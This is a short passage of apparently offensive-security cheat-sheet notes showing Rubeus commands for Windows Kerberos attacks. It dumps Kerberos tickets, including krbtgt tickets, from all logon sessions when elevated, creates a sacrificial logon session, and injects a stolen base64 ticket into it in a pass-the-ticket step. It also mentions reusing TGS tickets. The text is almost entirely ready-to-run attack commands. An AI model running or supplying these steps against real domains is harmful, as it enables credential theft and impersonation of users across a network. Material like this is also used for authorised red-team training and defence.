Show Kerberos tickets in all logon sessions if elevated (otherwise it will only show tickets in current logon session):
PS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrap
PS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>
You can also extract and reuse TGS tickets with this technique.